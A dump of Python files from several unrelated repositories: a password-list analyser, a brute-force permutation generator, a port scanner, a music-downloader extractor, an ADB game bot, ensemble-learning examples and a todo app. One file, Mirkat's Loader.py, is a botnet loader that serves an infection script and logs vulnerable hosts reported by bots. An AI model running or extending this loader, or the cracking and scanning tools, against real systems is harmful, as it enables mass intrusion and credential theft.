process_pool = ThreadPoolExecutor(max_workers=50)
seperators = [':', ';', '|']
def get_indexes_of_seperators(line):
indexes = {}
for seperator in seperators:
indexes[seperator] = line.find(seperator)
return indexes
def pick_seperator(indexes):
seperator = None
seperatorIndex = sys.maxsize
for key in indexes.keys():
if indexes[key] > 0 and indexes[key] < seperatorIndex:
seperator = key
return seperator
def do_analysis(user_id, password):
info_dict = {"user_id": user_id}
for analysis_method in analysis_methods:
info_dict.update(analysis_method(password))
output = dumps(info_dict)
return output
def start_analysis():
# Get the number of passwords to analyse
passwords_count = filetools.count_lines(INPUT_PASSWORD_LIST)
palog.log("Analysing {0} passwords".format(passwords_count))
results = []
password_index = 0
# Do the analysis
with open(OUTPUT_FILE, "w", 10000000, encoding="utf8") as data_list:
with open(INPUT_PASSWORD_LIST, 'r', 1024, encoding="utf8", errors="ignore") as password_list:
while True:
# Get a password from the list
line = filetools.clean_input(password_list.readline())
# Stop analysis if we are done
if not line:
break
if line and len(line) > 0 and line[0] in seperators:
line = line[1:]
indexes = get_indexes_of_seperators(line)
seperator = pick_seperator(indexes)
tokenized = line.split(seperator, 1)
user_id = tokenized[0]
password = tokenized[1]
if password is not None and len(password) > 0:
results.append(process_pool.submit(
do_analysis, user_id, password))
for result in results:
data_list.writelines(result.result() + "\n")
password_index += 1
# every 20th password update the progress bar
if password_index % 20 == 0:
progressbar.print_progress(
password_index, passwords_count, 50)
process_pool.shutdown()
progressbar.print_progress(passwords_count, passwords_count, 50)
print("")
palog.log("Finished analysis")
if __name__ == "__main__":
start_analysis()
```
#### File: PasswordAnalyser/paprogressbar/progressbar.py
```python
def print_progress(current, maximum, length):
completed = int(float(current)/float(maximum) * float(length))
completed_string = "#" * completed
uncompleted_string = "." * (length - completed)
clear_progress(length+2)
print("[{0}{1}]".format(completed_string, uncompleted_string), end='')
def clear_progress(length):
print("\b" * length, end='')
``` |
{
"source": "0x10F8/PCrack",
"score": 3
} |
#### File: PCrack/perm/permutations.py
```python
class Permutations:
def __init__(self, charset, max_length):
self._charset = charset
self._max_length = max_length
self._current_length = 1
self.__generate_indexes()
def set_current_length(self, current_length):
self._current_length = current_length
def set_current_indexes(self, current_indexes):
self._current_indexes = current_indexes
def __generate_indexes(self):
self._current_indexes = [0] * self._current_length
self._max_indexes = ''.join([(str(len(self._charset) - 1))] * self._current_length)
def has_next(self):
return self._current_length <= self._max_length
def next(self):
next_output = ''.join([self._charset[i] for i in self._current_indexes])
if self.__is_max_indexes():
self._current_length += 1
self.__generate_indexes()
else:
self.__increment_indexes()
return next_output
def __increment_indexes(self):
for i in range(0, len(self._current_indexes)):
if self._current_indexes[i] == len(self._charset) - 1:
self._current_indexes[i] = 0
else:
self._current_indexes[i] = self._current_indexes[i] + 1
return
def __is_max_indexes(self):
index_str = ''.join(map(str, self._current_indexes))
return index_str == self._max_indexes
``` |
{
"source": "0x10F8/pscan",
"score": 3
} |
#### File: 0x10F8/pscan/pscan.py
```python
from socket import socket, AF_INET, SOCK_STREAM, gethostbyname
from optparse import OptionParser, IndentedHelpFormatter
import logging
import sys
from concurrent.futures import ThreadPoolExecutor
from pings import Ping
''' The minimum port number '''
MIN_PORT = 1
''' The maximum port number '''
MAX_PORT = 65535
''' All ports '''
ALL_PORT_RANGE = [i for i in range(MIN_PORT, MAX_PORT + 1)]
''' The number of pings to use to determine if a host is up (through ICMP pings) '''
HOST_UP_PING_COUNT = 1
''' Default timeout for various actions throughout the script '''
DEFAULT_TIMEOUT = 1
''' Default number of worker threads to use when port scanning '''
DEFAULT_WORKER_THREADS = 1000
# Configure the logger to info
logging.basicConfig(format="%(message)s", level=logging.INFO)
class InvalidPortError(Exception):
"""
Raise this error when a port is outwith the ALL_PORT_RANGE limits
"""
def __init__(self, port):
self.port = port
class InvalidHostError(Exception):
"""
Raise this error where a host name cannot be resolved
"""
def __init__(self, host):
self.host = host
class InvalidPortFormatError(Exception):
"""
Raise this error if the port argument doesn't match the required format
"""
def __init__(self, port_string):
self.port_string = port_string
def is_host_up_icmp(host, timeout=DEFAULT_TIMEOUT):
"""
Checks whether a host is up. If the host specified is a resolvable hostname rather than an IP address
the method will first try to resolve the host name, if this fails an InvalidHostError will be raised.
Next a single ping is sent to the host, and if this ping receives a valid response then the method
returns True.
Note that a host might have ICMP response disable so this cannot be taken as 100% accurate.
:param host: The host to check
:param timeout: The maximum time to wait on the ping response
:return: Boolean True if the host responds to ping requests and has a valid host name tupled with the IP address
"""
try:
ip = gethostbyname(host)
except:
raise InvalidHostError(host)
response = ping_host(host, timeout, HOST_UP_PING_COUNT)
if response.packet_lost is None:
return True, ip
return False, None
def ping_host(host, timeout, count):
"""
Sends ping requests to a host.
:param host: The host to ping
:param timeout: The maximum time to wait on a ping
:param count: The number of pings to send
:return: Response object containing the ping information
"""
ping = Ping(timeout=(timeout * 1000))
return ping.ping(host, count)
def is_port_open(host, port, timeout=DEFAULT_TIMEOUT):
"""
Check if a specified remote host:port combination (socket) is listening.
This will attempt to create a socket to the specified remote host and port, if the connection
occurs then a tuple with the host, port and True should be returned almost instantly.
The socket connection attempt will wait for the specified timeout (default 1 seconds) before
returning a tuple with the host, port and False.
:param host: The remote address
:param port: The remote port
:param timeout: The timeout to wait for the socket connection (default 1s optional)
:return: A tuple in the format (host, port, is_open) where open is a boolean Value
"""
logging.debug("Scanning port %d" % port)
if port not in ALL_PORT_RANGE:
raise InvalidPortError(port)
try:
with socket(AF_INET, SOCK_STREAM) as sock:
sock.settimeout(timeout)
sock.connect((host, port))
return host, port, True
except:
return host, port, False
def scan_port_range(host, ports, timeout=DEFAULT_TIMEOUT, worker_threads=DEFAULT_WORKER_THREADS):
"""
Scan a port range on a host. This method will scan all of the ports in the ports list for the specified
using the is_open(host, port, timeout) method. If the socket does not connect within the timeout specified
it is marked as down. The process is multi-threaded and the maximum pool size is defined by the worker_threads
parameter.
:param host: The host to scan
:param ports: The ports to scan on the host
:param timeout: The timeout to wait until marking a port as down
:param worker_threads: The maximum number of threads to pool to execute the work
:return: Returns a list of tuples (host, port, is_open) where open is a Boolean value
"""
thread_pool = ThreadPoolExecutor(max_workers=worker_threads)
thread_results = []
results = []
for port in ports:
thread_results.append(thread_pool.submit(is_port_open, host, port, timeout))
for future in thread_results:
results.append(future.result())
thread_pool.shutdown()
return results
def filter_results(results, filter_function):
"""
Filter the results using a function on the result tuple.
:param results: The results list
:param filter_function: A function which acts upon a result tuple and returns True or False
:return: A list of results tuples where filter_function(result) is true for each member
"""
return [result for result in results if filter_function(result)]
def open_port_filter(result):
"""
Returns true if the specified result tuple is for an open port.
:param result: The result tuple (host, port, is_open)
:return: True or False depending on the is_open flag
"""
_, _, is_open = result
return is_open
def parse_port_string(port_string):
"""
This method will take a string of ports and port ranges from the passed user parameter and
attempt to generate a list of port integers in order and without duplicates.
:param port_string: The user input port string
:return: list of int's containing the ports to scan
"""
# Tokenize string by commas to find ranges
tokenized_by_comma = port_string.split(',')
# Find all port ranges (seperated by dashes) in tokenized values
ranges = [token for token in tokenized_by_comma if '-' in token]
# Find all non port ranges
str_ports = [token for token in tokenized_by_comma if '-' not in token]
# Add all string ports to the final port list and convert to ints
try:
ports = [int(port) for port in str_ports]
except:
# If the integer conversion failed then something weird was entered as a port
raise InvalidPortFormatError(str_ports)
# Convert string port ranges to the full list of int ports to scan
for port_range in ranges:
# Remove whitespace
port_range_trim = port_range.replace(' ', '')
# Tokenize by dash
tokenized_by_dash = port_range_trim.split('-')
# At this point we need to convert the range to integers and do some validation
# If there is not 2 numbers in the range then the user has entered something weird!
if len(tokenized_by_dash) != 2:
raise InvalidPortFormatError(port_range)
# If the 2 tokens are not integers then the user has entered something weird!
try:
from_port = int(tokenized_by_dash[0])
to_port = int(tokenized_by_dash[1])
except:
raise InvalidPortFormatError(port_range)
# If the from_port is not before the to_port then the user has entered something weird!
if from_port >= to_port:
raise InvalidPortFormatError(port_range)
for port in range(from_port, to_port):
ports.append(port)
# remove duplicates (might be since ranges can overlap or duplicate ports in comma separated lists)
ports = list(set(ports))
# sort from lowest to highest
ports.sort()
return ports
def get_service(port):
"""
TODO: implement a port to service mapping
:param port: the port to get the service for
:return: service name typically found on this port
"""
return 'NYI' # Not Yet Implemented
def pad_line(line, target_length, padding_char=' '):
"""
Pad a line to the desired length
:param line: The line to pad
:param target_length: The target length
:param padding_char: The padding char, defaults to space
:return: The padded string
"""
line = str(line)
extra = target_length - len(line)
padding = padding_char * extra
return line + padding
def print_results(results):
"""
Prints the results in a standard format and column length.
:param results: The results
:return: nothing
"""
# Setup target column count per header
port_cols = 12
state_cols = 9
service_cols = 10
# Setup headers
port_header = pad_line("PORT", port_cols)
state_header = pad_line("STATE", state_cols)
service_header = pad_line("SERVICE", service_cols)
# print header
print(" %s%s%s" % (port_header, state_header, service_header))
# print results
for result in results:
_, port, is_open = result
service = get_service(port)
print(" %s%s%s" % (pad_line(port, port_cols),
pad_line(("OPEN" if is_open else "CLOSED"), state_cols),
pad_line(service, service_cols)))
class PScanHelpFormatter(IndentedHelpFormatter):
"""Custom formatter to allow new lines in the epilog
"""
def __init__(self,
indent_increment=2,
max_help_position=24,
width=None,
short_first=1):
IndentedHelpFormatter.__init__(
self, indent_increment, max_help_position, width, short_first)
def format_epilog(self, epilog):
if epilog:
return "\n" + epilog + "\n"
else:
return ""
# Do option parsing
option_parser = OptionParser(usage="%prog -H <target_host> -p <target_port / port_range>",
formatter=PScanHelpFormatter())
option_parser.epilog = \
"""Examples:
{0} -H example.com -p 80
{0} -H example.com -p 80,443
{0} -H example.com -p 1-100
{0} -H example.com -p 1-100,443 -t 2
""".format(sys.argv[0])
option_parser.add_option('-H', dest='target_host', type='string', help='specify a target host')
option_parser.add_option('-p', dest='target_ports', type='string', help='specify a target port[s] / port range :')
option_parser.add_option('-t', dest='timeout', type='int', default=DEFAULT_TIMEOUT,
help='specify a timeout (seconds) to wait on socket '
'connection. Connections that take longer than'
' this are considered closed (DEFAULT: 1s)')
options, args = option_parser.parse_args()
target_host = options.target_host
target_port_string = options.target_ports
user_timeout = options.timeout
# Check arguments have been given
if target_host is None or target_port_string is None:
print("You must specify a target host and port[s]")
option_parser.print_usage()
exit(0)
# Parse ports from string arguments
try:
target_ports = parse_port_string(target_port_string)
except InvalidPortFormatError:
print("Invalid port parameter format")
exit(0)
if not (len(target_ports) > 0):
logging.error("You must specify a target host and port[s]")
option_parser.print_usage()
exit(0)
# Check if the host is up (resolving the address if necessary) and output a relevant message
try:
up, ip = is_host_up_icmp(target_host)
except InvalidHostError:
print("Host %s could not be resolved" % target_host)
exit(0)
if up:
print("Host %s(%s) is up" % (target_host, ip))
else:
print("Host %s is down or not responding to ICMP requests" % target_host)
# Do the port scanning
try:
open_ports = filter_results(scan_port_range(target_host, target_ports, user_timeout), open_port_filter)
except InvalidPortError as e:
print("Invalid port number %d" % e.port)
exit(0)
# Print the results
print_results(open_ports)
``` |
{
"source": "0x110100/you-get",
"score": 3
} |
#### File: you_get/extractors/kugou.py
```python
__all__ = ['kugou_download']
from ..common import *
from json import loads
from base64 import b64decode
import re
import hashlib
def kugou_download(url, output_dir=".", merge=True, info_only=False, **kwargs):
if url.lower().find("5sing")!=-1:
#for 5sing.kugou.com
html=get_html(url)
ticket=r1(r'"ticket":\s*"(.*)"',html)
j=loads(str(b64decode(ticket),encoding="utf-8"))
url=j['file']
title=j['songName']
songtype, ext, size = url_info(url)
print_info(site_info, title, songtype, size)
if not info_only:
download_urls([url], title, ext, size, output_dir, merge=merge)
elif url.lower().find("hash")!=-1:
return kugou_download_by_hash(url,output_dir,merge,info_only)
else:
#for the www.kugou.com/
return kugou_download_playlist(url, output_dir=output_dir, merge=merge, info_only=info_only)
# raise NotImplementedError(url)
def kugou_download_by_hash(url,output_dir = '.', merge = True, info_only = False):
#sample
#url_sample:http://www.kugou.com/song/#hash=93F7D2FC6E95424739448218B591AEAF&album_id=9019462
hash_val = match1(url,'hash=(\w+)')
album_id = match1(url,'album_id=(\d+)')
html = get_html("http://www.kugou.com/yy/index.php?r=play/getdata&hash={}&album_id={}".format(hash_val,album_id))
j =loads(html)
url = j['data']['play_url']
title = j['data']['audio_name']
# some songs cann't play because of copyright protection
if(url == ''):
return
songtype, ext, size = url_info(url)
print_info(site_info, title, songtype, size)
if not info_only:
download_urls([url], title, ext, size, output_dir, merge=merge)
def kugou_download_playlist(url, output_dir = '.', merge = True, info_only = False, **kwargs):
urls=[]
#download music leaderboard
#sample: http://www.kugou.com/yy/html/rank.html
if url.lower().find('rank') !=-1:
html=get_html(url)
pattern = re.compile('<a href="(http://.*?)" data-active=')
res = pattern.findall(html)
for song in res:
res = get_html(song)
pattern_url = re.compile('"hash":"(\w+)".*"album_id":(\d)+')
hash_val,album_id= res = pattern_url.findall(res)[0]
urls.append('http://www.kugou.com/song/#hash=%s&album_id=%s'%(hash_val,album_id))
# download album
# album sample: http://www.kugou.com/yy/album/single/1645030.html
elif url.lower().find('album')!=-1:
html = get_html(url)
pattern = re.compile('var data=(\[.*?\]);')
res = pattern.findall(html)[0]
for v in json.loads(res):
urls.append('http://www.kugou.com/song/#hash=%s&album_id=%s'%(v['hash'],v['album_id']))
# download the playlist
# playlist sample:http://www.kugou.com/yy/special/single/487279.html
else:
html = get_html(url)
pattern = re.compile('data="(\w+)\|(\d+)"')
for v in pattern.findall(html):
urls.append('http://www.kugou.com/song/#hash=%s&album_id=%s'%(v[0],v[1]))
print('http://www.kugou.com/song/#hash=%s&album_id=%s'%(v[0],v[1]))
#download the list by hash
for url in urls:
kugou_download_by_hash(url,output_dir,merge,info_only)
site_info = "kugou.com"
download = kugou_download
# download_playlist = playlist_not_supported("kugou")
download_playlist=kugou_download_playlist
``` |
{
"source": "0x11111111/ArknightsAssistant",
"score": 3
} |
#### File: ArknightsAssistant/deprecated/send_tap.py
```python
import os
import time
from deprecated import deprecated
@deprecated(version='0.2.1', reason='The class is merged into adb.py_auto_play')
class SendTap:
"""A broker for events like sending taps.
Attribute:
specific_device:
"""
def __init__(self, specific_device):
self.specific_device = specific_device
def tap(self, position, delay=0):
if delay:
time.sleep(delay)
os.system("adb -s {} shell input tap {} {}".format(self.specific_device, position[0], position[1]))
```
#### File: 0x11111111/ArknightsAssistant/pap_adb.py
```python
import os
import time
import logging
from PIL import Image
import cv2
import numpy as np
from typing import Union, Optional
logger = logging.getLogger('py_auto_play_adb_main')
class PyAutoPlay_adb():
"""This is the main class of PyAutoPlay containing most of the utilities interacting with window content and user.
The instance of this class serves as a broker to handle screenshot, resize, conversion, recognition and
implementation of actions.
Attributes:
id (str): A str indicating the device identity.
title (str): The title of window.
ratio (double): Ratio is set to height of original picture to standard one's. It is used to resize and
relocation.
template_name (list): A list containing the pictures to be recognized. The pictures are provided in str of their
file name and will be called by cv2.imread() to form templates.
template_path (str): A str indicating the path of template pictures.
tmp_path (str): A str indicating the path of temporary directory, which stores the temporary pictures captured.
img_type (str): A str indicating the format of pictures processed. Default and recommendation is 'PNG'.
std_height (int): A int representing the standard height of picture to be processed. The value is related with
the height of template original picture's full size. Because this program can handle with pictures from
different devices with unique size, it need a height as a standard in which all the pictures processed are
resized to it. We recommend the height of the picture which the templates are cropped from.
precondition (list): A list storing the preconditions required to be satisfied when an event is detected.
The records are stored in an individual dict.
[
{
'event': (str): If the event is detected and needs to perform an action before its precondition is
satisfied. For example, we need to check an agreement before we continue to perform actions.
The check of agreement is the precondition of the actions performing. The 'event' is given by
its file name and should be included in template_name list and located in template_path.
'precondition': (str): The precondition to be satisfied initially. Given by its file name and
required to be located in template_path.
'warning': (str): If the precondition failed to be satisfied, a warning will be issued and uttered
via the result of recognition.
}
]
adb_path (str): A str indicating the current path of 'adb.exe'.
"""
def __init__(self, template_name, precondition, adb_path, template_path='..\\adb\\template\\', tmp_path='..\\adb\\tmp\\',
img_type='PNG', std_height=810):
self.logger = logging.getLogger('py_auto_play_adb_main')
self.logger.info('Initialing.')
self.id = None
self.title = ''
self.ratio = 1
self.template_name = template_name
self.template_path = template_path
self.tmp_path = tmp_path
self.img_type = img_type
self.std_height = std_height
self.precondition = precondition
self.adb_path = adb_path
self.__template_dict = dict()
self.__precondition_dict = dict()
answer = os.popen('{} devices'.format(self.adb_path))
self.logger.info(answer.read())
self.logger.info('Creating templates.')
# Generate the templates stored in __template_dict.
for template in self.template_name:
template_full_path = self.template_path + template
self.__template_dict[template] = cv2.imread(template_full_path, cv2.IMREAD_COLOR)
self.logger.info('Creating precondition list.')
# Traverse the list of precondition and fetch the record dict. Then generate the binding information in
# __precondition_dict.
for record in self.precondition:
template_full_path = self.template_path + record['precondition']
if not record['event'] in self.__precondition_dict:
self.__precondition_dict[record['event']] = [{'template': cv2.imread(template_full_path, 1),
'warning': record['warning']}]
else:
self.__precondition_dict[record['event']] += {'template': cv2.imread(template_full_path, 1),
'warning': record['warning']}
def get_all_title_id(self) -> dict:
"""Obtain all the names of devices and their serial numbers.
Returns:
dict: A dict that holds both the serial number(str) and its name of devices.
"""
self.logger.info('Calling get_all_title_id.')
title_id = dict()
device_list = []
get_devices = os.popen('{} devices'.format(self.adb_path))
cmd_output = get_devices.read()
self.logger.info(cmd_output)
for line in cmd_output.splitlines():
if line.endswith('device'):
device_list.append(line[:line.find('\t')])
for device in device_list:
get_titles = os.popen('{} -s {} shell getprop ro.product.brand'.format(self.adb_path, device))
title = get_titles.read().strip()
title_id[title] = device
self.logger.info(title_id)
return title_id
def set_port(self, port):
"""Attempt to connect 127.0.0.1:{port}.
Args:
port (int): a port number of the emulator.
Returns:
dict: A dict that holds both the serial number(str) and its name of devices.
"""
os.popen('{} connect 127.0.0.1:{}'.format(self.adb_path, port))
return self.get_all_title_id()
def set_id(self, id):
"""Set the Attribute self.id to id.
Args:
id (str): a serial number of a device.
Returns:
None
"""
self.logger.info('Calling set_id.')
self.id = id
def sleep(self, _time):
"""Encapsulation of time.sleep().
Args:
_time (int): time to sleep in seconds.
Returns:
None
"""
time.sleep(_time)
def get_screenshot(self) -> Image.Image:
"""Get a screenshot from self.id device and adapt it.
The method will place the temporary image into self.tmp_path.
The temporary image is converted if the platform is because of the nuances of '\r\n' and '\r'.
After that, the image is resized according to self.std_height, by default, 810. Meanwhile self.ratio is set to
height of original picture to standard one's.
Returns:
Image.Image: a image object to be recognized.
"""
self.logger.info('Calling get_screenshot.')
if not os.path.exists(self.tmp_path):
os.mkdir(self.tmp_path)
# Pid is used to distinguish from different threads.
screenshot_path = self.tmp_path + 'screenshot_' + str(os.getpid()) + '.' + self.img_type.lower()
# The following command should be 'exec-out', which should neglect the replacement of '\r\n' and '\r'.
# However, most of the tested adb doesn't work out as definition so 'shell' is used here.
os.system('{} -s {} shell screencap -p > {}'.format(self.adb_path, self.id, screenshot_path))
with open(screenshot_path, 'rb') as f:
original_pic = f.read()
converted_pic = None
if original_pic[4:8] == b'\r\r\r\n':
converted_pic = original_pic.replace(b'\r\r\n', b'\n')
self.logger.info('Converted \\r\\r\\r\\n.')
elif original_pic[4:7] == b'\r\r\n':
converted_pic = original_pic.replace(b'\r\n', b'\n')
self.logger.info('Converted \\r\\r\\n.')
elif original_pic[4:6] == b'\r\n':
converted_pic = original_pic
self.logger.info('No convertion.')
with open(screenshot_path, 'wb') as f:
f.write(converted_pic)
f.close()
# The method copy assigned a replica to im and the original image has no reference to it. So it can be safely deleted.
im = Image.open(screenshot_path).copy()
original_size = im.size
if original_size[1] == self.std_height:
self.ratio = 1
self.logger.info('Screenshot ratio == 1.')
else:
self.ratio = original_size[1] / self.std_height
self.logger.info('Screenshot ratio == {}.'.format(self.ratio))
converted_size = (int(original_size[0] / self.ratio), int(original_size[1] / self.ratio))
im = im.resize(converted_size)
im.save(screenshot_path, self.img_type)
# Temporary screenshot shall be removed after initialization. Because the file name is generated by the pid of
# python program and differs from each run. If left unattended, tmp directory will be piled up with pngs.
os.remove(screenshot_path)
return im
def recognize(self, image) -> dict:
"""A function that serves as recognizer between screenshots and template pictures.
Args:
image (Image.Image):
Returns:
dict: A result of recognition.
{
'precondition': (bool): Only occurs when the image in template is also included in
precondition['event']. True if the condition is satisfied and false otherwise.
'warning': (list): Only occurs when the image in template is also included in precondition['event'].
If satisfied, value is a an empty list and if not, a list including warning information in
precondition['warning'] is provided.
'template': (str): The name of the template detected.
'position': (tuple):((int, int), (int, int)) A rectangular area defined by its left top and bottom
right coordination. Mind that the coordination is matched to the resized picture and need to be
relocated according to self.ratio.
'confidence': (double): The extent to which the template matches the certain target in screenshot.
Usually values over 0.95 if a match is detected.
}
"""
self.logger.info('Calling recognize.')
im = cv2.cvtColor(np.asarray(image), cv2.COLOR_RGB2BGR)
image.close()
recognition_res_dict = dict()
for template_name in self.template_name:
template = self.__template_dict[template_name]
width, height, _ = template.shape[::]
tmp_recognition_res = cv2.matchTemplate(im, template, eval('cv2.TM_CCOEFF_NORMED'))
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(tmp_recognition_res)
top_left = max_loc
confidence = max_val
# confidence is used to identify if the a certain picture in templates is recognized.
if confidence < 0.9:
continue
else:
if template_name in self.__precondition_dict:
recognition_res_dict['precondition'] = True
recognition_res_dict['warning'] = []
for precondition in self.__precondition_dict[template_name]:
tmp_precondition_res = cv2.matchTemplate(im, precondition['template'],
eval('cv2.TM_CCOEFF_NORMED'))
_, max_val, _, _ = cv2.minMaxLoc(tmp_precondition_res)
if max_val > 0.9:
pass
else:
recognition_res_dict['precondition'] = False
recognition_res_dict['warning'].append(precondition['warning'])
bottom_right = (top_left[0] + height, top_left[1] + width)
recognition_res_dict['template'] = template_name
recognition_res_dict['position'] = ((top_left[0] + bottom_right[0]) // 2,
(top_left[1] + bottom_right[1]) // 2)
recognition_res_dict['confidence'] = confidence
return recognition_res_dict
def send_action(self, position, action=None, delay=0):
"""Action to perform, by default a click on position after delay.
Args:
position (tuple): A coordination indicating the position to be tapped. Will be masked if position in
action[3] is given.
action (list): Special action(s) to be performed.
delay (int): Time to sleep (now).
Returns:
None
"""
self.logger.info('Calling send_action.')
if delay:
self.sleep(delay)
# Special action is by default None and only in this case a tap on position is sent directly.
if action is None:
os.system('{} -s {} shell input tap {} {}'.format(self.adb_path, self.id, position[0], position[1]))
else:
# If action[3](position) is especially designated and not equal to (0, 0),
# the given position in parameter list will be shaded.
if action[3] and not (action[3][0], action[3][1]) == (0, 0):
position = action[3]
# If action[0](key) is empty str, nothing will happen except for sleep delay.
if not action[0]:
if action[1]:
self.sleep(action[1])
# If action[0](key) is 'click', a click will be sent following given action[1](delay) seconds.
# The click
elif action[0] == 'click':
if action[1]:
self.sleep(action[1])
for i in range(action[2]):
os.system('{} -s {} shell input tap {} {}'.format(self.adb_path, self.id, position[0], position[1]))
# Completion in future.
else:
pass
``` |
{
"source": "0x11DFE/Mirkat",
"score": 2
} |
#### File: 0x11DFE/Mirkat/Loader.py
```python
import http.server, socketserver, threading, functools, socket
__FileServerPort__ = 1337
__ListennerPort__ = 6969
class MirkatConnection(threading.Thread):
def __init__(self, session: socket.socket, ip: str, port: int):
threading.Thread.__init__(self)
self.session = session
self.port = port
self.ip = ip
def run(self):
print(f'[+] Connection etablished with {self.ip}:{self.port}')
while True:
try:
data = self.session.recv(1024).decode('utf-8').strip().split('\n')[0]
if '|' in data:
args= data.split('|')
if args[0] == 'hit':
print(f'[%] Hit from {self.ip} --> {args[1]}')
with open('./db/vuln.txt', 'a+') as vf:
vf.write(f'{args[1]}\n')
except:
pass
class Loader():
def __init__(self):
self.run()
def http_server(self):
with socketserver.TCPServer(('0.0.0.0', __FileServerPort__), functools.partial(http.server.SimpleHTTPRequestHandler, directory= './Bin/')) as httpd:
print(f'[*] File server open on port {__FileServerPort__}.')
httpd.serve_forever()
def run(self):
threading.Thread(target= self.http_server).start()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', __ListennerPort__))
print(f'[*] Loader listenning on port {__ListennerPort__}')
while True:
sock.listen(1000)
(socket_session, (ip, port)) = sock.accept()
MirkatConnection(socket_session, ip, port).start()
if __name__ == '__main__':
with open('./Bin/infect.sh', 'r+') as pf:
print(f'[*] Payload "{pf.read()}"')
Loader().run()
``` |
{
"source": "0x15F9/DeepStack",
"score": 3
} |
#### File: DeepStack/examples/Cifar10.py
```python
import UtilsCifar10
from deepstack.base import KerasMember
from deepstack.ensemble import DirichletEnsemble
from deepstack.ensemble import StackEnsemble
from sklearn.ensemble import RandomForestRegressor
def cifar10_example(nmembers=4):
"""
Runs 2 DeepStack Ensemble Models for the CIFAR-10 Dataset.
Args:
nmembers: amount of ensemble members to be generated
Returns: an instance of StackEnsemble and DirichletEnsemble for the
CIFAR-10 dataset
"""
stack = StackEnsemble() # Meta-Learner
stack.model = RandomForestRegressor(verbose=1, n_estimators=300 * nmembers,
max_depth=nmembers * 2, n_jobs=4)
dirichletEnsemble = DirichletEnsemble(N=2000 * nmembers)
for i in range(nmembers):
# Creates a Random CNN Keras Model for CIFAR-10 Dataset
model, training_batch, validation_batch = UtilsCifar10.get_random_cifar_model()
"""
Rationale: The Validation and Testing dataset of a base-learner
is the Training and Validation Dataset of a Meta-Learner.
Idea is to avoid validating the meta-learner
on data that the base-learner has already seen on training
"""
member = KerasMember(name="model" + str(i + 1), keras_model=model,
train_batches=training_batch,
val_batches=validation_batch) # Base-Learners
stack.add_member(member) # Adds base-learner to Stack Ensemble
dirichletEnsemble.add_member(member) # Adds base-learner
stack.fit()
dirichletEnsemble.fit()
return stack, dirichletEnsemble
if __name__ == "__main__":
# Run Examples
stack, dirichletEnsemble = cifar10_example()
stack.describe()
"""
Possible similar Output:
model1 - AUC: 0.8044
model2 - AUC: 0.8439
model3 - AUC: 0.8218
model4 - AUC: 0.8487
StackEnsemble AUC: 0.8727
"""
dirichletEnsemble.describe()
"""
Possible similar Output:
model1 - Weight: 0.1055 - AUC: 0.8044
model2 - Weight: 0.2882 - AUC: 0.8439
model3 - Weight: 0.2127 - AUC: 0.8218
model4 - Weight: 0.3936 - AUC: 0.8487
DirichletEnsemble AUC: 0.8821
"""
``` |
{
"source": "0x16c3/todoApp",
"score": 3
} |
#### File: todoApp/server/todoAppServer.py
```python
from flask import Flask, jsonify, request
import json
from flask_cors import CORS
from mongoengine import connect, StringField, Document, DateTimeField, BooleanField
from datetime import datetime
connect("todo")
app = Flask(__name__)
CORS(app, resources={r"/*": {"origins": "*"}})
class todoObject:
_id = ""
title = ""
description = ""
is_completed = None
created_at = ""
updated_at = ""
def __init__(self, **kwargs) -> "todoObject":
self._id = kwargs["_id"]
self.title = kwargs["title"]
self.description = kwargs["description"]
self.is_completed = kwargs["is_completed"]
self.updated_at = kwargs["updated_at"]
self.created_at = kwargs["created_at"]
class todoList(Document):
title = StringField()
description = StringField()
is_completed = BooleanField()
created_at = DateTimeField()
updated_at = DateTimeField()
def create(
self,
title: str,
description: str,
is_completed: bool = False,
created_at: datetime = None,
updated_at: datetime = datetime.now(),
) -> "todoList":
self.title = title
self.description = description
self.is_completed = is_completed
self.updated_at = updated_at
if created_at:
self.created_at = created_at
return self
@app.route("/todoList", methods=["GET", "POST", "PUT"])
@app.route("/todoList/<string:oid>", methods=["DELETE"])
def index(oid=None):
if oid == None:
if request.method == "GET":
todo_list = todoList.objects()
if len(todo_list) < 1:
return ""
all_objects = []
for object in todo_list.order_by("-id"):
todo = todoObject(
_id=str(object.id),
title=object.title,
description=object.description,
is_completed=object.is_completed,
created_at=object.created_at.strftime("%m/%d/%Y, %H:%M:%S"),
updated_at=object.updated_at.strftime("%m/%d/%Y, %H:%M:%S"),
)
all_objects.append(todo.__dict__)
return json.dumps(all_objects)
elif request.method == "POST":
data = request.get_json()
new_todo = todoList().create(
title=data["title"],
description=data["description"],
created_at=datetime.now(),
)
new_todo.save()
return jsonify(success="OK")
elif request.method == "PUT":
data = request.get_json()
oid = data["_id"]
object = todoList.objects(id=oid).first()
if not object:
return jsonify(success="FAIL")
object.is_completed = True
object.updated_at = datetime.now()
object.save()
return jsonify(success="OK")
else:
if request.method == "DELETE":
object = todoList.objects(id=oid).first()
if not object:
return jsonify(success="FAIL")
object.delete()
return jsonify(success="OK")
if __name__ == "__main__":
app.run(port=5005, debug=True)
``` |
{
"source": "0x174/conflux",
"score": 3
} |
#### File: api/api_v1/action_graph.py
```python
from enum import Enum
from dataclasses import dataclass, field
from typing import List
# ---------------------- Capabilities Classes Start Here -----------------------
# We define things such as robotic control, or lab equipment as Resources. Each
# Resource has certain capabilities described here. For example, a Hamilton has
# the capability for Liquid Handling, Motion, and Thermal Control while an OT2
# does not have access to Motion.
#
# This obviously gets muddy as many of our targets have modular capabilities,
# such as the addition of extending subsytems. For the purposes of our initial
# pass we're going to ignore that capability.
class Capabilities(Enum):
LIQUID_HANDLING = "LiquidHandling"
THERMAL_CONTROL = "ThermalControl"
MOTION = "Motion"
@dataclass
class BaseCapabilities:
name: str = None
capabilities: Enum = None
@dataclass
class HamiltonCapabilities(BaseCapabilities):
name: str = "Hamilton"
capabilities: List = field(default_factory=list)
def __post_init__(self):
self.capabilities = [
Capabilities.LIQUID_HANDLING,
Capabilities.THERMAL_CONTROL,
Capabilities.MOTION,
]
@dataclass
class OT2Capabilities(BaseCapabilities):
pass
@dataclass
class BioautomationPrimitiveBase:
pass
class ActionGraph:
def __init__(self):
"""
"""
pass
if __name__ == '__main__':
thing = HamiltonCapabilities()
print(thing.capabilities)
```
#### File: app/crud/crud_protocol.py
```python
from typing import List
from fastapi.encoders import jsonable_encoder
from sqlalchemy.orm import Session
from app.crud.base import CRUDBase
from app.models.protocols import Protocol
from app.schemas.protocols import ProtocolCreate, ProtocolUpdate
